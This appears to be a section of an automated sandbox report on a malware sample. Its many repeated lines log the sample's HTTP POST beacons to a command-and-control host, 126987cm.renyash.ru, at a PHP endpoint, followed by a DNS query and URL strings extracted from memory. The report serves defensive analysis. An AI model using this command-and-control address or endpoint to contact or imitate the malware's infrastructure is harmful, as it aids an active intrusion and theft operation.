                                    Source: global trafficHTTP traffic detected: POST /VmpipeJavascript_HttpauthLongpollMultiWordpressDle.php HTTP/1.1Content-Type: application/x-www-form-urlencodedUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/96.0.4664.45 Safari/537.36Host: 126987cm.renyash.ruContent-Length: 1072Expect: 100-continueConnection: Keep-Alive
                                    Source: global trafficHTTP traffic detected: POST /VmpipeJavascript_HttpauthLongpollMultiWordpressDle.php HTTP/1.1Content-Type: application/x-www-form-urlencodedUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/96.0.4664.45 Safari/537.36Host: 126987cm.renyash.ruContent-Length: 1072Expect: 100-continueConnection: Keep-Alive
                                    Source: global trafficHTTP traffic detected: POST /VmpipeJavascript_HttpauthLongpollMultiWordpressDle.php HTTP/1.1Content-Type: application/x-www-form-urlencodedUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/96.0.4664.45 Safari/537.36Host: 126987cm.renyash.ruContent-Length: 1764Expect: 100-continueConnection: Keep-Alive
                                    Source: global trafficHTTP traffic detected: POST /VmpipeJavascript_HttpauthLongpollMultiWordpressDle.php HTTP/1.1Content-Type: application/x-www-form-urlencodedUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/96.0.4664.45 Safari/537.36Host: 126987cm.renyash.ruContent-Length: 1072Expect: 100-continueConnection: Keep-Alive
                                    Source: global trafficHTTP traffic detected: POST /VmpipeJavascript_HttpauthLongpollMultiWordpressDle.php HTTP/1.1Content-Type: application/x-www-form-urlencodedUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/96.0.4664.45 Safari/537.36Host: 126987cm.renyash.ruContent-Length: 1072Expect: 100-continue
                                    Source: global trafficHTTP traffic detected: POST /VmpipeJavascript_HttpauthLongpollMultiWordpressDle.php HTTP/1.1Content-Type: application/x-www-form-urlencodedUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/96.0.4664.45 Safari/537.36Host: 126987cm.renyash.ruContent-Length: 1072Expect: 100-continue
                                    Source: global trafficHTTP traffic detected: POST /VmpipeJavascript_HttpauthLongpollMultiWordpressDle.php HTTP/1.1Content-Type: application/x-www-form-urlencodedUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/96.0.4664.45 Safari/537.36Host: 126987cm.renyash.ruContent-Length: 1072Expect: 100-continueConnection: Keep-Alive
                                    Source: global trafficHTTP traffic detected: POST /VmpipeJavascript_HttpauthLongpollMultiWordpressDle.php HTTP/1.1Content-Type: application/x-www-form-urlencodedUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/96.0.4664.45 Safari/537.36Host: 126987cm.renyash.ruContent-Length: 1072Expect: 100-continueConnection: Keep-Alive
                                    Source: global trafficHTTP traffic detected: POST /VmpipeJavascript_HttpauthLongpollMultiWordpressDle.php HTTP/1.1Content-Type: application/x-www-form-urlencodedUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/96.0.4664.45 Safari/537.36Host: 126987cm.renyash.ruContent-Length: 1072Expect: 100-continueConnection: Keep-Alive
                                    Source: global trafficHTTP traffic detected: POST /VmpipeJavascript_HttpauthLongpollMultiWordpressDle.php HTTP/1.1Content-Type: application/x-www-form-urlencodedUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/96.0.4664.45 Safari/537.36Host: 126987cm.renyash.ruContent-Length: 1064Expect: 100-continueConnection: Keep-Alive
                                    Source: global trafficHTTP traffic detected: POST /VmpipeJavascript_HttpauthLongpollMultiWordpressDle.php HTTP/1.1Content-Type: application/x-www-form-urlencodedUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/96.0.4664.45 Safari/537.36Host: 126987cm.renyash.ruContent-Length: 1788Expect: 100-continueConnection: Keep-Alive
                                    Source: global trafficHTTP traffic detected: POST /VmpipeJavascript_HttpauthLongpollMultiWordpressDle.php HTTP/1.1Content-Type: application/x-www-form-urlencodedUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/96.0.4664.45 Safari/537.36Host: 126987cm.renyash.ruContent-Length: 1072Expect: 100-continueConnection: Keep-Alive
                                    Source: global trafficHTTP traffic detected: POST /VmpipeJavascript_HttpauthLongpollMultiWordpressDle.php HTTP/1.1Content-Type: application/x-www-form-urlencodedUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/96.0.4664.45 Safari/537.36Host: 126987cm.renyash.ruContent-Length: 1072Expect: 100-continue
                                    Source: global trafficHTTP traffic detected: POST /VmpipeJavascript_HttpauthLongpollMultiWordpressDle.php HTTP/1.1Content-Type: application/x-www-form-urlencodedUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/96.0.4664.45 Safari/537.36Host: 126987cm.renyash.ruContent-Length: 1064Expect: 100-continue
                                    Source: global trafficHTTP traffic detected: POST /VmpipeJavascript_HttpauthLongpollMultiWordpressDle.php HTTP/1.1Content-Type: application/x-www-form-urlencodedUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/96.0.4664.45 Safari/537.36Host: 126987cm.renyash.ruContent-Length: 1064Expect: 100-continueConnection: Keep-Alive
                                    Source: global trafficHTTP traffic detected: POST /VmpipeJavascript_HttpauthLongpollMultiWordpressDle.php HTTP/1.1Content-Type: application/x-www-form-urlencodedUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/96.0.4664.45 Safari/537.36Host: 126987cm.renyash.ruContent-Length: 1072Expect: 100-continueConnection: Keep-Alive
                                    Source: global trafficHTTP traffic detected: POST /VmpipeJavascript_HttpauthLongpollMultiWordpressDle.php HTTP/1.1Content-Type: application/x-www-form-urlencodedUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/96.0.4664.45 Safari/537.36Host: 126987cm.renyash.ruContent-Length: 1072Expect: 100-continueConnection: Keep-Alive
                                    Source: global trafficHTTP traffic detected: POST /VmpipeJavascript_HttpauthLongpollMultiWordpressDle.php HTTP/1.1Content-Type: application/x-www-form-urlencodedUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/96.0.4664.45 Safari/537.36Host: 126987cm.renyash.ruContent-Length: 1772Expect: 100-continueConnection: Keep-Alive
                                    Source: global trafficHTTP traffic detected: POST /VmpipeJavascript_HttpauthLongpollMultiWordpressDle.php HTTP/1.1Content-Type: application/x-www-form-urlencodedUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/96.0.4664.45 Safari/537.36Host: 126987cm.renyash.ruContent-Length: 1072Expect: 100-continueConnection: Keep-Alive
                                    Source: global trafficHTTP traffic detected: POST /VmpipeJavascript_HttpauthLongpollMultiWordpressDle.php HTTP/1.1Content-Type: application/x-www-form-urlencodedUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/96.0.4664.45 Safari/537.36Host: 126987cm.renyash.ruContent-Length: 1072Expect: 100-continue
                                    Source: global trafficHTTP traffic detected: POST /VmpipeJavascript_HttpauthLongpollMultiWordpressDle.php HTTP/1.1Content-Type: application/x-www-form-urlencodedUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/96.0.4664.45 Safari/537.36Host: 126987cm.renyash.ruContent-Length: 1072Expect: 100-continueConnection: Keep-Alive
                                    Source: global trafficHTTP traffic detected: POST /VmpipeJavascript_HttpauthLongpollMultiWordpressDle.php HTTP/1.1Content-Type: application/x-www-form-urlencodedUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/96.0.4664.45 Safari/537.36Host: 126987cm.renyash.ruContent-Length: 1072Expect: 100-continueConnection: Keep-Alive
                                    Source: global trafficHTTP traffic detected: POST /VmpipeJavascript_HttpauthLongpollMultiWordpressDle.php HTTP/1.1Content-Type: application/x-www-form-urlencodedUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/96.0.4664.45 Safari/537.36Host: 126987cm.renyash.ruContent-Length: 1072Expect: 100-continueConnection: Keep-Alive
                                    Source: global trafficHTTP traffic detected: POST /VmpipeJavascript_HttpauthLongpollMultiWordpressDle.php HTTP/1.1Content-Type: application/x-www-form-urlencodedUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/96.0.4664.45 Safari/537.36Host: 126987cm.renyash.ruContent-Length: 1072Expect: 100-continueConnection: Keep-Alive
                                    Source: global trafficHTTP traffic detected: POST /VmpipeJavascript_HttpauthLongpollMultiWordpressDle.php HTTP/1.1Content-Type: application/x-www-form-urlencodedUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/96.0.4664.45 Safari/537.36Host: 126987cm.renyash.ruContent-Length: 1072Expect: 100-continueConnection: Keep-Alive
                                    Source: global trafficHTTP traffic detected: POST /VmpipeJavascript_HttpauthLongpollMultiWordpressDle.php HTTP/1.1Content-Type: application/x-www-form-urlencodedUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/96.0.4664.45 Safari/537.36Host: 126987cm.renyash.ruContent-Length: 1788Expect: 100-continueConnection: Keep-Alive
                                    Source: global trafficHTTP traffic detected: POST /VmpipeJavascript_HttpauthLongpollMultiWordpressDle.php HTTP/1.1Content-Type: application/x-www-form-urlencodedUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/96.0.4664.45 Safari/537.36Host: 126987cm.renyash.ruContent-Length: 1072Expect: 100-continueConnection: Keep-Alive
                                    Source: global trafficHTTP traffic detected: POST /VmpipeJavascript_HttpauthLongpollMultiWordpressDle.php HTTP/1.1Content-Type: application/x-www-form-urlencodedUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/96.0.4664.45 Safari/537.36Host: 126987cm.renyash.ruContent-Length: 1072Expect: 100-continue
                                    Source: global trafficHTTP traffic detected: POST /VmpipeJavascript_HttpauthLongpollMultiWordpressDle.php HTTP/1.1Content-Type: application/x-www-form-urlencodedUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/96.0.4664.45 Safari/537.36Host: 126987cm.renyash.ruContent-Length: 1072Expect: 100-continueConnection: Keep-Alive
                                    Source: global trafficHTTP traffic detected: POST /VmpipeJavascript_HttpauthLongpollMultiWordpressDle.php HTTP/1.1Content-Type: application/x-www-form-urlencodedUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/96.0.4664.45 Safari/537.36Host: 126987cm.renyash.ruContent-Length: 1072Expect: 100-continueConnection: Keep-Alive
                                    Source: global trafficHTTP traffic detected: POST /VmpipeJavascript_HttpauthLongpollMultiWordpressDle.php HTTP/1.1Content-Type: application/x-www-form-urlencodedUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/96.0.4664.45 Safari/537.36Host: 126987cm.renyash.ruContent-Length: 1072Expect: 100-continueConnection: Keep-Alive
                                    Source: global trafficHTTP traffic detected: POST /VmpipeJavascript_HttpauthLongpollMultiWordpressDle.php HTTP/1.1Content-Type: application/x-www-form-urlencodedUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/96.0.4664.45 Safari/537.36Host: 126987cm.renyash.ruContent-Length: 1072Expect: 100-continueConnection: Keep-Alive
                                    Source: global trafficHTTP traffic detected: POST /VmpipeJavascript_HttpauthLongpollMultiWordpressDle.php HTTP/1.1Content-Type: application/x-www-form-urlencodedUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/96.0.4664.45 Safari/537.36Host: 126987cm.renyash.ruContent-Length: 1072Expect: 100-continueConnection: Keep-Alive
                                    Source: global trafficHTTP traffic detected: POST /VmpipeJavascript_HttpauthLongpollMultiWordpressDle.php HTTP/1.1Content-Type: application/x-www-form-urlencodedUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/96.0.4664.45 Safari/537.36Host: 126987cm.renyash.ruContent-Length: 1788Expect: 100-continueConnection: Keep-Alive
                                    Source: global trafficHTTP traffic detected: POST /VmpipeJavascript_HttpauthLongpollMultiWordpressDle.php HTTP/1.1Content-Type: application/x-www-form-urlencodedUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/96.0.4664.45 Safari/537.36Host: 126987cm.renyash.ruContent-Length: 1072Expect: 100-continueConnection: Keep-Alive
                                    Source: global trafficHTTP traffic detected: POST /VmpipeJavascript_HttpauthLongpollMultiWordpressDle.php HTTP/1.1Content-Type: application/x-www-form-urlencodedUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/96.0.4664.45 Safari/537.36Host: 126987cm.renyash.ruContent-Length: 1072Expect: 100-continue
                                    Source: global trafficHTTP traffic detected: POST /VmpipeJavascript_HttpauthLongpollMultiWordpressDle.php HTTP/1.1Content-Type: application/x-www-form-urlencodedUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/96.0.4664.45 Safari/537.36Host: 126987cm.renyash.ruContent-Length: 1072Expect: 100-continueConnection: Keep-Alive
                                    Source: global trafficHTTP traffic detected: POST /VmpipeJavascript_HttpauthLongpollMultiWordpressDle.php HTTP/1.1Content-Type: application/x-www-form-urlencodedUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/96.0.4664.45 Safari/537.36Host: 126987cm.renyash.ruContent-Length: 1072Expect: 100-continueConnection: Keep-Alive
                                    Source: global trafficHTTP traffic detected: POST /VmpipeJavascript_HttpauthLongpollMultiWordpressDle.php HTTP/1.1Content-Type: application/x-www-form-urlencodedUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/96.0.4664.45 Safari/537.36Host: 126987cm.renyash.ruContent-Length: 1072Expect: 100-continueConnection: Keep-Alive
                                    Source: global trafficHTTP traffic detected: POST /VmpipeJavascript_HttpauthLongpollMultiWordpressDle.php HTTP/1.1Content-Type: application/x-www-form-urlencodedUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/96.0.4664.45 Safari/537.36Host: 126987cm.renyash.ruContent-Length: 1072Expect: 100-continueConnection: Keep-Alive
                                    Source: global trafficHTTP traffic detected: POST /VmpipeJavascript_HttpauthLongpollMultiWordpressDle.php HTTP/1.1Content-Type: application/x-www-form-urlencodedUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/96.0.4664.45 Safari/537.36Host: 126987cm.renyash.ruContent-Length: 1072Expect: 100-continueConnection: Keep-Alive
                                    Source: global trafficHTTP traffic detected: POST /VmpipeJavascript_HttpauthLongpollMultiWordpressDle.php HTTP/1.1Content-Type: application/x-www-form-urlencodedUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/96.0.4664.45 Safari/537.36Host: 126987cm.renyash.ruContent-Length: 1072Expect: 100-continueConnection: Keep-Alive
                                    Source: global trafficHTTP traffic detected: POST /VmpipeJavascript_HttpauthLongpollMultiWordpressDle.php HTTP/1.1Content-Type: application/x-www-form-urlencodedUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/96.0.4664.45 Safari/537.36Host: 126987cm.renyash.ruContent-Length: 1788Expect: 100-continueConnection: Keep-Alive
                                    Source: global trafficHTTP traffic detected: POST /VmpipeJavascript_HttpauthLongpollMultiWordpressDle.php HTTP/1.1Content-Type: application/x-www-form-urlencodedUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/96.0.4664.45 Safari/537.36Host: 126987cm.renyash.ruContent-Length: 1072Expect: 100-continueConnection: Keep-Alive
                                    Source: global trafficHTTP traffic detected: POST /VmpipeJavascript_HttpauthLongpollMultiWordpressDle.php HTTP/1.1Content-Type: application/x-www-form-urlencodedUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/96.0.4664.45 Safari/537.36Host: 126987cm.renyash.ruContent-Length: 1072Expect: 100-continue
                                    Source: global trafficHTTP traffic detected: POST /VmpipeJavascript_HttpauthLongpollMultiWordpressDle.php HTTP/1.1Content-Type: application/x-www-form-urlencodedUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/96.0.4664.45 Safari/537.36Host: 126987cm.renyash.ruContent-Length: 1072Expect: 100-continue
                                    Source: global trafficHTTP traffic detected: POST /VmpipeJavascript_HttpauthLongpollMultiWordpressDle.php HTTP/1.1Content-Type: application/x-www-form-urlencodedUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/96.0.4664.45 Safari/537.36Host: 126987cm.renyash.ruContent-Length: 1064Expect: 100-continueConnection: Keep-Alive
                                    Source: global trafficHTTP traffic detected: POST /VmpipeJavascript_HttpauthLongpollMultiWordpressDle.php HTTP/1.1Content-Type: application/x-www-form-urlencodedUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/96.0.4664.45 Safari/537.36Host: 126987cm.renyash.ruContent-Length: 1072Expect: 100-continue
                                    Source: global trafficHTTP traffic detected: POST /VmpipeJavascript_HttpauthLongpollMultiWordpressDle.php HTTP/1.1Content-Type: application/x-www-form-urlencodedUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/96.0.4664.45 Safari/537.36Host: 126987cm.renyash.ruContent-Length: 1072Expect: 100-continueConnection: Keep-Alive
                                    Source: global trafficHTTP traffic detected: POST /VmpipeJavascript_HttpauthLongpollMultiWordpressDle.php HTTP/1.1Content-Type: application/x-www-form-urlencodedUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/96.0.4664.45 Safari/537.36Host: 126987cm.renyash.ruContent-Length: 1072Expect: 100-continueConnection: Keep-Alive
                                    Source: global trafficHTTP traffic detected: POST /VmpipeJavascript_HttpauthLongpollMultiWordpressDle.php HTTP/1.1Content-Type: application/x-www-form-urlencodedUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/96.0.4664.45 Safari/537.36Host: 126987cm.renyash.ruContent-Length: 1788Expect: 100-continueConnection: Keep-Alive
                                    Source: global trafficHTTP traffic detected: POST /VmpipeJavascript_HttpauthLongpollMultiWordpressDle.php HTTP/1.1Content-Type: application/x-www-form-urlencodedUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/96.0.4664.45 Safari/537.36Host: 126987cm.renyash.ruContent-Length: 1072Expect: 100-continueConnection: Keep-Alive
                                    Source: global trafficHTTP traffic detected: POST /VmpipeJavascript_HttpauthLongpollMultiWordpressDle.php HTTP/1.1Content-Type: application/x-www-form-urlencodedUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/96.0.4664.45 Safari/537.36Host: 126987cm.renyash.ruContent-Length: 1072Expect: 100-continue
                                    Source: global trafficHTTP traffic detected: POST /VmpipeJavascript_HttpauthLongpollMultiWordpressDle.php HTTP/1.1Content-Type: application/x-www-form-urlencodedUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/96.0.4664.45 Safari/537.36Host: 126987cm.renyash.ruContent-Length: 1072Expect: 100-continueConnection: Keep-Alive
                                    Source: global trafficHTTP traffic detected: POST /VmpipeJavascript_HttpauthLongpollMultiWordpressDle.php HTTP/1.1Content-Type: application/x-www-form-urlencodedUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/96.0.4664.45 Safari/537.36Host: 126987cm.renyash.ruContent-Length: 1072Expect: 100-continueConnection: Keep-Alive
                                    Source: global trafficHTTP traffic detected: POST /VmpipeJavascript_HttpauthLongpollMultiWordpressDle.php HTTP/1.1Content-Type: application/x-www-form-urlencodedUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/96.0.4664.45 Safari/537.36Host: 126987cm.renyash.ruContent-Length: 1072Expect: 100-continueConnection: Keep-Alive
                                    Source: global trafficHTTP traffic detected: POST /VmpipeJavascript_HttpauthLongpollMultiWordpressDle.php HTTP/1.1Content-Type: application/x-www-form-urlencodedUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/96.0.4664.45 Safari/537.36Host: 126987cm.renyash.ruContent-Length: 1072Expect: 100-continueConnection: Keep-Alive
                                    Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
                                    Source: global trafficDNS traffic detected: DNS query: 126987cm.renyash.ru
                                    Source: unknownHTTP traffic detected: POST /VmpipeJavascript_HttpauthLongpollMultiWordpressDle.php HTTP/1.1Content-Type: application/x-www-form-urlencodedUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/96.0.4664.45 Safari/537.36Host: 126987cm.renyash.ruContent-Length: 344Expect: 100-continueConnection: Keep-Alive
                                    Source: iwpFyCLxsYWXWxaOAxPIfjTlvkGJkQ.exe, 00000015.00000002.2906400363.0000000002C86000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://126987cm.reP
                                    Source: iwpFyCLxsYWXWxaOAxPIfjTlvkGJkQ.exe, 00000015.00000002.2906400363.0000000002C86000.00000004.00000800.00020000.00000000.sdmp, iwpFyCLxsYWXWxaOAxPIfjTlvkGJkQ.exe, 00000015.00000002.2906400363.0000000002819000.00000004.00000800.00020000.00000000.sdmp, iwpFyCLxsYWXWxaOAxPIfjTlvkGJkQ.exe, 00000015.00000002.2906400363.0000000002AA2000.00000004.00000800.00020000.00000000.sdmp, iwpFyCLxsYWXWxaOAxPIfjTlvkGJkQ.exe, 00000015.00000002.2906400363.0000000002B09000.00000004.00000800.00020000.00000000.sdmp, iwpFyCLxsYWXWxaOAxPIfjTlvkGJkQ.exe, 00000015.00000002.2906400363.0000000002606000.00000004.00000800.00020000.00000000.sdmp, iwpFyCLxsYWXWxaOAxPIfjTlvkGJkQ.exe, 00000015.00000002.2906400363.00000000027A2000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://126987cm.renyash.ru
                                    Source: iwpFyCLxsYWXWxaOAxPIfjTlvkGJkQ.exe, 00000015.00000002.2906400363.0000000002606000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://126987cm.renyash.ru/
                                    Source: iwpFyCLxsYWXWxaOAxPIfjTlvkGJkQ.exe, 00000015.00000002.2906400363.0000000002C86000.00000004.00000800.00020000.00000000.sdmp, iwpFyCLxsYWXWxaOAxPIfjTlvkGJkQ.exe, 00000015.00000002.2906400363.0000000002819000.00000004.00000800.00020000.00000000.sdmp, iwpFyCLxsYWXWxaOAxPIfjTlvkGJkQ.exe, 00000015.00000002.2906400363.0000000002AA2000.00000004.00000800.00020000.00000000.sdmp, iwpFyCLxsYWXWxaOAxPIfjTlvkGJkQ.exe, 00000015.00000002.2906400363.0000000002B09000.00000004.00000800.00020000.00000000.sdmp, iwpFyCLxsYWXWxaOAxPIfjTlvkGJkQ.exe, 00000015.00000002.2906400363.00000000027A2000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://126987cm.renyash.ru/VmpipeJavascript_HttpauthLongpollMultiWordpressDle.php
                                    Source: bridgeportDhcpcommon.exe, 00000005.00000002.1918124129.0000000003C2C000.00000004.00000800.00020000.00000000.sdmp, iwpFyCLxsYWXWxaOAxPIfjTlvkGJkQ.exe, 00000015.00000002.2906400363.0000000002606000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://schemas.xmlsoap.org/ws/2005/05/identity/claims/name
                                    Source: iwpFyCLxsYWXWxaOAxPIfjTlvkGJkQ.exe, 00000015.00000002.2944133945.000000001DDC2000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://www.apache.org/licenses/LICENSE-2.0
                                    Source: iwpFyCLxsYWXWxaOAxPIfjTlvkGJkQ.exe, 00000015.00000002.2944133945.000000001DDC2000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://www.carterandcone.coml
                                    Source: iwpFyCLxsYWXWxaOAxPIfjTlvkGJkQ.exe, 00000015.00000002.2944133945.000000001DDC2000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://www.fontbureau.com
                                    Source: iwpFyCLxsYWXWxaOAxPIfjTlvkGJkQ.exe, 00000015.00000002.2944133945.000000001DDC2000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://www.fontbureau.com/designers
                                    Source: iwpFyCLxsYWXWxaOAxPIfjTlvkGJkQ.exe, 00000015.00000002.2944133945.000000001DDC2000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://www.fontbureau.com/designers/?
                                    Source: iwpFyCLxsYWXWxaOAxPIfjTlvkGJkQ.exe, 00000015.00000002.2944133945.000000001DDC2000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://www.fontbureau.com/designers/cabarga.htmlN
                                    Source: iwpFyCLxsYWXWxaOAxPIfjTlvkGJkQ.exe, 00000015.00000002.2944133945.000000001DDC2000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://www.fontbureau.com/designers/frere-user.html
                                    Source: iwpFyCLxsYWXWxaOAxPIfjTlvkGJkQ.exe, 00000015.00000002.2944133945.000000001DDC2000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://www.fontbureau.com/designers8
                                    Source: iwpFyCLxsYWXWxaOAxPIfjTlvkGJkQ.exe, 00000015.00000002.2944133945.000000001DDC2000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://www.fontbureau.com/designers?
                                    Source: iwpFyCLxsYWXWxaOAxPIfjTlvkGJkQ.exe, 00000015.00000002.2944133945.000000001DDC2000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://www.fontbureau.com/designersG
                                    Source: iwpFyCLxsYWXWxaOAxPIfjTlvkGJkQ.exe, 00000015.00000002.2944133945.000000001DDC2000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://www.fonts.com
                                    Source: iwpFyCLxsYWXWxaOAxPIfjTlvkGJkQ.exe, 00000015.00000002.2944133945.000000001DDC2000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://www.founder.com.cn/cn
                                    Source: iwpFyCLxsYWXWxaOAxPIfjTlvkGJkQ.exe, 00000015.00000002.2944133945.000000001DDC2000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://www.founder.com.cn/cn/bThe
                                    Source: iwpFyCLxsYWXWxaOAxPIfjTlvkGJkQ.exe, 00000015.00000002.2944133945.000000001DDC2000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://www.founder.com.cn/cn/cThe
                                    Source: iwpFyCLxsYWXWxaOAxPIfjTlvkGJkQ.exe, 00000015.00000002.2944133945.000000001DDC2000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://www.galapagosdesign.com/DPlease
                                    Source: iwpFyCLxsYWXWxaOAxPIfjTlvkGJkQ.exe, 00000015.00000002.2944133945.000000001DDC2000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://www.galapagosdesign.com/staff/dennis.htm
